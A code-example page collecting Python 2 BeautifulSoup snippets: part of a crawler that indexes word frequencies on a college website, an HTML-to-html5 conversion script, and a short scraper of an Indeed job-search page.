                                 or re.match(r"https\:\/\/", newLink[0:8]))):
                        if (re.search(r"muhlenberg", newLink)):
                            if not (re.search(r"\#", newLink)):
                                try:
                                    ## Checks to make sure the the URLs being added
                                    ## are not PDF files.
                                    if not (re.match(r".*.pdf$", str(newLink))
                                            or re.match(
                                                r".*sync\.muhlenberg\.edu.*",
                                                str(newLink))
                                            or re.match(
                                                r".*capstone.*", str(newLink))
                                            or re.match(
                                                r".*blogs.*", str(newLink))
                                            or re.match(
                                                r"http://www.muhlenberg.edu\w+.html",
                                                str(newLink))):
                                        if not (re.match(
                                                r".*javascript.*",
                                                str(newLink)) or re.match(
                                                    r".*webapp.*",
                                                    str(newLink)) or re.match(
                                                        r".*edumailto.*",
                                                        str(newLink))):
                                            add = True
                                            for nope, value in evadeAndConquor.items(
                                            ):
                                                # print nope
                                                if re.search(
                                                        r".*" + nope + r".*",
                                                        str(newLink)):
                                                    add = False
                                                    # print "found it", nope
                                            if add:
                                                # If the link has not been visited before,
                                                # add it to the queue.
                                                if (visitedHash.get(
                                                        newLink,
                                                        False) == False):
                                                    linksQ.enqueue(newLink)
                                except:
                                    print "Your URL is not a string:", newLink

                    else:
                        if not (re.search(r"\#", newLink)):
                            ## TODO: MAKE SURE THIS WORKS FOR EVERY CASE.
                            end = url.find(r'/', 7)
                            newLink = url[0:end] + newLink
                            try:
                                ## Checks to make sure the the URLs being added
                                ## are not PDF files.
                                if not (re.match(r".*.pdf$", str(newLink)) or
                                        re.match(r".*sync\.muhlenberg\.edu.*",
                                                 str(newLink)) or
                                        re.match(r".*capstone.*", str(newLink))
                                        or re.match(r".*blogs.*", str(newLink))
                                        or re.match(
                                            r"http://www.muhlenberg.edu\w+.html",
                                            str(newLink))):
                                    if not (re.match(r".*javascript.*",
                                                     str(newLink))
                                            or re.match(
                                                r".*webapp.*", str(newLink)) or
                                            re.match(r".*edumailto.*",
                                                     str(newLink))):
                                        add = True
                                        for nope, value in evadeAndConquor.items(
                                        ):
                                            # print nope
                                            if re.search(
                                                    r".*" + nope + r".*",
                                                    str(newLink)):
                                                add = False
                                                # print "found it", nope
                                        if add:
                                            # If the link has not been visited before,
                                            # add it to the queue.
                                            if (visitedHash.get(
                                                    newLink, False) == False):
                                                linksQ.enqueue(newLink)
                            except:
                                print "Your URL is not a string:", newLink

            i += 1
            tempDoc = open("Files/Documents/doc" + str(i) + ".txt", 'w')
            for line in soup.prettify():
                tempDoc.write(line)

            tempDoc.close()
            # This will find all of the tokens in the file and store them in
            # a hash of tokens with their doc# and freq (TempDictForWordFreq) and
            # a hash of tokens and how many docs they appear in and which
            for line in soup.findAll('p'):
                if not line.find('iframe'):
                    line = line.text
                    if not (re.match(r"http\:\/\/.*", line)):
                        if (line != None):
                            words = line.split(' ')
                            for word in words:
                                if (re.search(
                                        r"\.([com]|[org]|[net]|[int]|[edu]|[gov])",
                                        word)):
                                    word = word.replace(word, "")
                                ## TODO: Maybe remove hypens?
                                # token = re.sub(r"and", "", word)
                                token = re.sub(r"&\w*;", "", word)
                                token = re.sub(r"[^A-Za-z\']*", "", token)
                                token = re.sub(r"[\t]", "", token)
                                token = token.lower()
                                if (token != "" and token != " "):
                                    if (stemWords):
                                        token = stemmer.lemmatize(token, 'v')
                                        token = stemmer.lemmatize(token, 'n')

                                    token = token.strip()

                                    if (len(token) > 1):
                                        if (removeStopWords):
                                            ## If the token isnt a stop word, add it.
                                            if (stopWords.get(token,
                                                              False) == False):
                                                if not re.search(
                                                        r'\r\n', token):
                                                    TempDictForWordFreq[
                                                        token] = int(
                                                            TempDictForWordFreq
                                                            .get(token, 0)) + 1
                                                    GlobalDictForWordFreq[
                                                        token] = int(
                                                            GlobalDictForWordFreq
                                                            .get(token, 0)) + 1

                                        else:
                                            TempDictForWordFreq[token] = int(
                                                TempDictForWordFreq.get(
                                                    token, 0)) + 1
                                            GlobalDictForWordFreq[token] = int(
                                                GlobalDictForWordFreq.get(
                                                    token, 0)) + 1

            j += 1
            i = j

            for key, val in TempDictForWordFreq.items():
                # print "current word", key
                # print "was it found in the perminate dictionary", JuLiDoTheThing.get(key, False) != False
                if (JuLiDoTheThing.get(key, False) != False):
                    FerricksList = JuLiDoTheThing.get(key, False)
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList
                else:
                    FerricksList = list()
                    FerricksList.append([i, val])
                    JuLiDoTheThing[key] = FerricksList

            # If we haven't visited the file before, add it to the visitedHash
            # if (visitedHash.get(url, False) == False):
            visitedHash[url.strip()] = i

            print "Document", i, "has been processed."
            last = False
Beispiel #33
0
infile.close()

if options.replace:
  outfile = open(infilepath, 'w')
else:
  try:
    outfilepath = args[1]
  except IndexError:
    outfile = sys.stdout
  else:
    outfile = open(outfilepath, 'w')

soup = BeautifulSoup(inhtml)

parser = html5lib.HTMLParser(tree=treebuilders.getTreeBuilder("lxml"))
doc = parser.parse(soup.prettify())


"""
Convert headings to hgroups where appropriate
---------------------------------------------
"""

if options.hgroup:
  hgroupise(doc)
if options.section:
  sectionise(doc)
if options.normalize:
  normalize(doc)

"""
Beispiel #34
0
import requests
from BeautifulSoup import BeautifulSoup

url = 'https://www.indeed.com/jobs?q=Entry-Level+Machine+Learning+&l=San+Francisco&radius=25'
response = requests.get(url)
html = response.content

soup = BeautifulSoup(html)
table = soup.find('tbody', attrs={'class': 'stripe'})
print soup.prettify()